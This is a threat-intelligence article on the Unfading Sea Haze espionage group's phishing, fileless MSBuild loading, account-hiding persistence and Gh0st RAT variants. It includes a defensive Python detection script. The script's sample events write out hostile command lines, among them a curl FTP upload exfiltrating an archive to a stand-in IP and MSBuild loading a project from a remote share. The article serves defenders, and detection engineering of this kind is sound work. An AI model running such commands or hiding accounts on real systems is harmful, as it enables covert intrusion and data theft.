Tracing a Persistent Threat with Unfading Sea Haze’s Stealthy Cyber Tactics

Defense & Government

A persistent threat group identified as "Unfading Sea Haze" has been targeting government and military organizations, primarily in South China Sea countries, since at least 2018. According to Bitdefender researchers, the group's operations align closely with Chinese geopolitical interests and focus on intelligence collection and sustained espionage. Unfading Sea Haze has compromised at least eight victims, and the stealth of its intrusions is underscored by the researchers' observation of an "extended period of Unfading Sea Haze's invisibility, exceeding five years." The group's persistence is also evident in repeat breaches enabled by "poor credential hygiene and inadequate patching practices," which allowed the attackers to reestablish their foothold after being removed.

Among the attack methods observed, Unfading Sea Haze often initiates attacks through spear-phishing emails carrying malicious ZIP archives. These archives contain LNK files that appear benign but run malicious commands when opened. A common tactic is to embed extensive, deceptive comments within the LNK file's command line to evade detection. The command also checks for specific security processes; if they are absent, the attack proceeds with PowerShell scripts that deploy fileless malware directly into memory using tools such as MSBuild.exe. Because the code is loaded from remote SMB servers rather than written to disk, this approach leaves minimal forensic evidence. Another aspect of their strategy is persistence, achieved by manipulating local accounts and creating scheduled tasks that blend in with legitimate system operations. They manipulate accounts by enabling deactivated accounts, resetting passwords, and hiding accounts from the logon screen by modifying the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList registry key.

Unfading Sea Haze's arsenal showcases its cyber espionage capabilities through an array of custom malware, including several strains of Gh0st RAT tailored to specific operational needs. The earliest variant, SilentGh0st, was a detectable yet powerful tool owing to its wide range of commands and modules. It evolved into InsidiousGh0st, which reduced redundancy, was ported from C++ to C# and Go, and improved features such as SOCKS5 and TCP proxy support and PowerShell integration. The more recent strains, TranslucentGh0st, EtherealGh0st, and FluffyGh0st, adopt a modular approach that minimizes their footprint and enhances stealth through dynamic plugin loading. For data exfiltration, the threat actors previously used a custom tool named "DustyExfilTool"; recent campaigns have instead used the curl utility and the FTP protocol. This adaptability keeps their operations covert and resilient across a range of targets.
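The persistence tradecraft described two paragraphs above (enabling and resetting local accounts, hiding them via the SpecialAccounts\UserList key, scheduled tasks, MSBuild.exe loading a project from a remote share) and the curl/FTP exfiltration described here are all visible in ordinary Windows telemetry. The following added example, which is not code from the Bitdefender report or from Anvilogic, shows how a detection engineer might correlate those signals per host. It assumes Windows Security event IDs 4722 (account enabled), 4724 (password reset attempt) and 4698 (scheduled task created) and Sysmon event IDs 1 (process create) and 13 (registry value set), normalized into flat dictionaries; the sample events, host names, user names and IP addresses are constructed for illustration.

```python
"""Correlate constructed Windows/Sysmon events into per-host alerts (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample telemetry, not real logs. Shapes loosely follow Windows Security
# events 4722/4724/4698 and Sysmon events 1 (process create) and 13 (registry set).
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    {"host": "FS01", "source": "Security", "event_id": 4722,
     "subject_user": "svc_backup", "target_user": "Guest"},
    {"host": "FS01", "source": "Security", "event_id": 4724,
     "subject_user": "svc_backup", "target_user": "Guest"},
    {"host": "FS01", "source": "Sysmon", "event_id": 13,
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
                      r"\SpecialAccounts\UserList\Guest",
     "details": "DWORD (0x00000000)"},
    {"host": "FS01", "source": "Security", "event_id": 4698,
     "subject_user": "svc_backup", "task_name": r"\Microsoft\Windows\Maintenance\SilentCleanupCheck"},
    {"host": "WS07", "source": "Sysmon", "event_id": 1, "image": MSBUILD,
     "command_line": r"MSBuild.exe \\203.0.113.9\share\update.xml",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"host": "WS07", "source": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -T C:\Users\Public\docs.rar ftp://203.0.113.9/inbox/",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    # Benign noise: a local developer build and a plain HTTPS download must not fire.
    {"host": "DEV02", "source": "Sysmon", "event_id": 1, "image": MSBUILD,
     "command_line": r"MSBuild.exe C:\src\app\app.csproj",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"host": "DEV02", "source": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl.exe -O https://example.com/tool.zip",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
]


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    severity: str
    detail: str


USERLIST_KEY = "\\winlogon\\specialaccounts\\userlist\\"
UNC_OR_URL = re.compile(r"(\\\\[^\s\\]+\\|https?://)", re.IGNORECASE)


def detect_hidden_account(events):
    """Registry write hiding a user from the logon screen (UserList value set to 0)."""
    alerts = []
    for e in events:
        if e.get("event_id") != 13:
            continue
        obj = e.get("target_object", "")
        if USERLIST_KEY in obj.lower() and "0x00000000" in e.get("details", ""):
            user = obj.rsplit("\\", 1)[-1]
            alerts.append(Alert("hidden_local_account", e["host"], "high",
                                f"UserList value zeroed for {user}"))
    return alerts


def detect_account_tampering(events):
    """Account enabled (4722) and then password reset (4724) on the same target by one actor."""
    enabled = {(e["host"], e["target_user"], e["subject_user"])
               for e in events if e.get("event_id") == 4722}
    return [Alert("account_enabled_then_reset", e["host"], "medium",
                  f"{e['subject_user']} enabled and reset password of {e['target_user']}")
            for e in events if e.get("event_id") == 4724
            and (e["host"], e["target_user"], e["subject_user"]) in enabled]


def detect_msbuild_remote_project(events):
    """MSBuild.exe given a UNC path or URL as its project: the fileless loading pattern."""
    return [Alert("msbuild_remote_project", e["host"], "high", e["command_line"])
            for e in events if e.get("event_id") == 1
            and e["image"].lower().endswith("\\msbuild.exe")
            and UNC_OR_URL.search(e["command_line"])]


def detect_curl_ftp_upload(events):
    """curl.exe uploading a file (-T / --upload-file) to an ftp:// destination."""
    alerts = []
    for e in events:
        if e.get("event_id") != 1 or not e["image"].lower().endswith("\\curl.exe"):
            continue
        cmd = e["command_line"]
        if "ftp://" in cmd.lower() and (" -T " in cmd or "--upload-file" in cmd):
            alerts.append(Alert("curl_ftp_upload", e["host"], "medium", cmd))
    return alerts


def detect_task_after_account_tampering(events):
    """Scheduled task (4698) created by an actor who also enabled an account on that host."""
    actors = {(e["host"], e["subject_user"]) for e in events if e.get("event_id") == 4722}
    return [Alert("task_by_account_tamperer", e["host"], "medium", e["task_name"])
            for e in events if e.get("event_id") == 4698
            and (e["host"], e["subject_user"]) in actors]


RULES = [detect_hidden_account, detect_account_tampering, detect_msbuild_remote_project,
         detect_curl_ftp_upload, detect_task_after_account_tampering]


def run_detections(events):
    """Apply every rule to the event set and collect the alerts."""
    return [alert for rule in RULES for alert in rule(events)]


def hosts_by_risk(alerts):
    """Rank hosts by the number of distinct rules fired so chains of weak signals surface."""
    per_host = defaultdict(set)
    for a in alerts:
        per_host[a.host].add(a.rule)
    return sorted(((h, sorted(r)) for h, r in per_host.items()), key=lambda hr: -len(hr[1]))


if __name__ == "__main__":
    for host, rules in hosts_by_risk(run_detections(SAMPLE_EVENTS)):
        print(host, rules)
```

Each rule on its own is noisy in a large estate (administrators do enable accounts and developers do run MSBuild), which is why the final ranking counts distinct rules per host: the file server with a hidden, freshly reset account plus a new scheduled task by the same actor rises to the top, while the developer workstation with a local build and an HTTPS download produces no alert at all.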

Unfading Sea Haze represents a highly organized and elusive cyber threat actor, primarily engaged in espionage within critical sectors. Bitdefender's report offers insight into the group's use of advanced techniques such as fileless attacks and modular malware, and helps defenders identify the essential detections to monitor. Organizations in the targeted regions and sectors should adopt comprehensive security measures, including regular patching, credential management, and enhanced monitoring, to mitigate the risks posed by these threats. The potential links to APT41, suggested by overlaps in their toolsets, further emphasize the need for vigilance.
